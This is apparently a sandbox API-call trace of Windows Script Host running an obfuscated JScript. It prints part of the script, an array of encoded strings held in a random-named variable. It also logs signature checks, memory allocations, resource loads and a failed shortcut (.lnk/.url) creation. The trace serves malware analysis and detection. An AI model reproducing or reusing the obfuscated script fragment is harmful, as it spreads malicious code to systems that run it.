	[0078.478] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0078.478] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0078.478] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.478] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.478] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.478] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.478] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.478] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.478] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0078.478] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.478] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0078.478] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0078.478] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0078.478] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.478] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0078.478] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0078.478] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.478] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.478] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0078.478] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0078.478] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0078.478] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0078.478] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0078.479] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.479] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.479] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0078.479] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.479] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.479] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0078.479] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.479] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0078.479] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0078.479] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0078.479] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0078.479] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0078.479] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.479] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.479] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0078.479] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0078.479] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0078.479] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0078.479] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.481] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0078.481] CloseCodeAuthzLevel () returned 0x1
	[0078.481] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0078.481] ??2@YAPEAX_K@Z () returned 0x4ff3f0
	[0078.481] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0078.481] GetProcessHeap () returned 0x1c0000
	[0078.482] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1f8430, Size=0x11238) returned 0x22ae20
	[0078.483] ??2@YAPEAX_K@Z () returned 0x4ff480
	[0078.483] GetCurrentThreadId () returned 0x8c4
	[0078.483] realloc (_Block=0x0, _Size=0xc8) returned 0x4ff4e0
	[0078.483] ??2@YAPEAX_K@Z () returned 0x4ff5b0
	[0078.483] malloc (_Size=0x1008) returned 0x4fa4f0
	[0078.483] ??2@YAPEAX_K@Z () returned 0x4ff5f0
	[0078.483] malloc (_Size=0x108) returned 0x4f7d80
	[0078.484] malloc (_Size=0x208) returned 0x4ff7a0
	[0078.484] malloc (_Size=0x200) returned 0x4ff9b0
	[0078.484] malloc (_Size=0x408) returned 0x4ffbc0
	[0078.484] malloc (_Size=0x2008) returned 0x4fb500
	[0078.484] malloc (_Size=0x808) returned 0x4fd510
	[0078.485] malloc (_Size=0x1008) returned 0x4fdd20
	[0078.486] malloc (_Size=0x4008) returned 0x33dfd0
	[0078.486] malloc (_Size=0x2008) returned 0x341fe0
	[0078.488] malloc (_Size=0x4008) returned 0x343ff0
	[0079.167] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0079.167] CObjectContext::Release () returned 0x1
	[0079.167] GetTickCount () returned 0x2477a
	[0079.167] ??2@YAPEAX_K@Z () returned 0x346560
	[0079.168] ??2@YAPEAX_K@Z () returned 0x346590
	[0079.168] ??2@YAPEAX_K@Z () returned 0x3465c0
	[0079.169] ??2@YAPEAX_K@Z () returned 0x3465f0
	[0079.169] ??2@YAPEAX_K@Z () returned 0x346620
	[0079.169] ??2@YAPEAX_K@Z () returned 0x346650
	[0079.170] ??2@YAPEAX_K@Z () returned 0x346680
	[0079.170] ??2@YAPEAX_K@Z () returned 0x3466b0
	[0079.171] ??2@YAPEAX_K@Z () returned 0x3466e0
	[0079.171] ??2@YAPEAX_K@Z () returned 0x346710
	[0079.172] ??2@YAPEAX_K@Z () returned 0x346740
	[0079.172] ??2@YAPEAX_K@Z () returned 0x346770
	[0079.173] ??2@YAPEAX_K@Z () returned 0x3467a0
	[0079.174] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0079.174] CObjectContext::Release () returned 0x1
	[0079.174] GetTickCount () returned 0x2477a
	[0079.175] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0079.175] CObjectContext::Release () returned 0x1
	[0079.175] GetTickCount () returned 0x2477a
	[0079.177] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0079.177] CObjectContext::Release () returned 0x1
	[0079.177] GetTickCount () returned 0x2477a
	[0079.178] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0079.178] CObjectContext::Release () returned 0x1
	[0079.178] GetTickCount () returned 0x2477a
	[0079.179] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0079.190] CObjectContext::Release () returned 0x1
	[0079.190] GetTickCount () returned 0x2478a
	[0079.193] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0079.193] CObjectContext::Release () returned 0x1
	[0079.193] GetTickCount () returned 0x2478a
	[0079.197] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0079.197] CObjectContext::Release () returned 0x1
	[0079.197] GetTickCount () returned 0x2479a
	[0079.197] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0079.197] CObjectContext::Release () returned 0x1
	[0079.197] GetTickCount () returned 0x2479a
	[0079.198] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0079.198] CObjectContext::Release () returned 0x1
	[0079.198] GetTickCount () returned 0x2479a
	[0079.199] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0079.199] CObjectContext::Release () returned 0x1
	[0079.200] GetTickCount () returned 0x2479a
	[0079.201] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0079.201] CObjectContext::Release () returned 0x1
	[0079.201] GetTickCount () returned 0x2479a
	[0079.201] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0079.201] CObjectContext::Release () returned 0x1
	[0079.201] GetTickCount () returned 0x2479a
	[0079.202] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0079.202] CObjectContext::Release () returned 0x1
	[0079.202] GetTickCount () returned 0x2479a
	[0079.204] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0079.204] CObjectContext::Release () returned 0x1
	[0079.204] GetTickCount () returned 0x2479a
	[0079.205] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0079.205] CObjectContext::Release () returned 0x1
	[0079.205] GetTickCount () returned 0x2479a
	[0079.206] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0079.206] CObjectContext::Release () returned 0x1
	[0079.206] GetTickCount () returned 0x2479a
	[0079.207] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0079.207] CObjectContext::Release () returned 0x1
	[0079.207] GetTickCount () returned 0x2479a
	[0079.208] FindResourceA (hModule=0x7fedf4c0000, lpName=0x139, lpType=0x6) returned 0x1b07f8
	[0079.208] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07f8) returned 0x1b1d44
	[0079.208] LockResource (hResData=0x1b1d44) returned 0x1b1d44
	[0079.209] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07f8) returned 0x15c
	[0079.209] FreeResource (hResData=0x1b1d44) returned 0
	[0079.209] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0079.209] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0079.209] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0079.209] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0079.210] FreeResource (hResData=0x1b1c74) returned 0
	[0079.210] bsearch (_Key=0x19d2b8, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a5a8
	[0079.210] ??2@YAPEAX_K@Z () returned 0x380a20
	[0079.483] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0079.483] CObjectContext::Release () returned 0x1
	[0079.483] GetTickCount () returned 0x248b2
	[0079.486] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0079.486] CObjectContext::Release () returned 0x1
	[0079.486] GetTickCount () returned 0x248b2
	[0079.487] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0079.487] CObjectContext::Release () returned 0x1
	[0079.487] GetTickCount () returned 0x248b2
	[0079.488] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0079.488] CObjectContext::Release () returned 0x1
	[0079.488] GetTickCount () returned 0x248b2
	[0079.490] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0079.490] CObjectContext::Release () returned 0x1
	[0079.490] GetTickCount () returned 0x248b2
	[0079.492] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0079.492] CObjectContext::Release () returned 0x1
	[0079.492] GetTickCount () returned 0x248c2
	[0079.494] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0079.494] CObjectContext::Release () returned 0x1
	[0079.494] GetTickCount () returned 0x248c2
	[0079.496] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0079.496] CObjectContext::Release () returned 0x1
	[0079.496] GetTickCount () returned 0x248c2
	[0079.498] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0079.498] CObjectContext::Release () returned 0x1
	[0079.498] GetTickCount () returned 0x248c2
	[0079.501] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0079.502] CObjectContext::Release () returned 0x1
	[0079.502] GetTickCount () returned 0x248c2
	[0079.505] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0079.505] CObjectContext::Release () returned 0x1
	[0079.505] GetTickCount () returned 0x248c2
	[0079.510] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0079.510] CObjectContext::Release () returned 0x1
	[0079.510] GetTickCount () returned 0x248d2
	[0079.514] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0079.514] CObjectContext::Release () returned 0x1
	[0079.514] GetTickCount () returned 0x248d2
	[0079.516] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0079.516] CObjectContext::Release () returned 0x1
	[0079.516] GetTickCount () returned 0x248d2
	[0079.520] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0079.520] CObjectContext::Release () returned 0x1
	[0079.520] GetTickCount () returned 0x248d2
	[0079.747] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0079.747] CObjectContext::Release () returned 0x1
	[0079.747] GetTickCount () returned 0x249bc
	[0079.751] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0079.751] CObjectContext::Release () returned 0x1
	[0079.751] GetTickCount () returned 0x249bc
	[0079.754] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0079.755] CObjectContext::Release () returned 0x1
	[0079.755] GetTickCount () returned 0x249bc
	[0079.760] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0079.760] CObjectContext::Release () returned 0x1
	[0079.760] GetTickCount () returned 0x249cb
	[0079.765] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0079.765] CObjectContext::Release () returned 0x1
	[0079.765] GetTickCount () returned 0x249cb
	[0079.768] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0079.768] CObjectContext::Release () returned 0x1
	[0079.768] GetTickCount () returned 0x249cb
	[0079.777] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0079.777] CObjectContext::Release () returned 0x1
	[0079.777] GetTickCount () returned 0x249db
	[0080.007] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0080.007] CObjectContext::Release () returned 0x1
	[0080.007] GetTickCount () returned 0x24ac5
	[0080.011] _resetstkoflw () returned 0x1
	[0080.012] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x1b0718
	[0080.012] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x1b0b6c
	[0080.012] LockResource (hResData=0x1b0b6c) returned 0x1b0b6c
	[0080.012] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x86
	[0080.012] FreeResource (hResData=0x1b0b6c) returned 0
	[0080.012] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0080.012] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0080.013] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0080.013] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0080.013] FreeResource (hResData=0x1b1c74) returned 0
	[0080.013] bsearch (_Key=0xb3478, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0080.013] ??2@YAPEAX_K@Z () returned 0x3c86b0
	[0080.026] CreateErrorInfo (in: pperrinfo=0x19c150 | out: pperrinfo=0x19c150*=0x20a718) returned 0x0
	[0080.027] CErrorObject::SetGUID () returned 0x0
	[0080.027] CErrorObject::SetSource () returned 0x0
	[0080.027] LoadStringW (in: hInstance=0x7fef24e0000, uID=0x1004, lpBuffer=0x19a890, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0080.027] FormatMessageW (in: dwFlags=0x500, lpSource=0x20e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x19c160, nSize=0x0, Arguments=0x19c1d0 | out: lpBuffer="\xd380\x25") returned 0x31
	[0080.027] CErrorObject::SetDescription () returned 0x0
	[0080.027] CErrorObject::SetHelpFile () returned 0x0
	[0080.027] CErrorObject::SetHelpContext () returned 0x0
	[0080.027] QueryInterface () returned 0x0
	[0080.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x20a710) returned 0x0
	[0080.027] Release () returned 0x2
	[0080.027] IUnknown:Release (This=0x20a710) returned 0x1
	[0080.027] LocalFree (hMem=0x25d380) returned 0x0
	[0080.028] IUnknown:Release (This=0x25c0f0) returned 0x1
	[0080.028] GetTickCount () returned 0x24ae4
	[0080.028] bsearch (_Key=0x19d2b8, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a3e0
	[0080.028] ??2@YAPEAX_K@Z () returned 0x402050
	[0080.033] SetItemAlloc () returned 0x0
	[0080.033] Release () returned 0x1
	[0080.033] QueryInterface () returned 0x80004002
	[0080.033] QueryInterface () returned 0x80004002
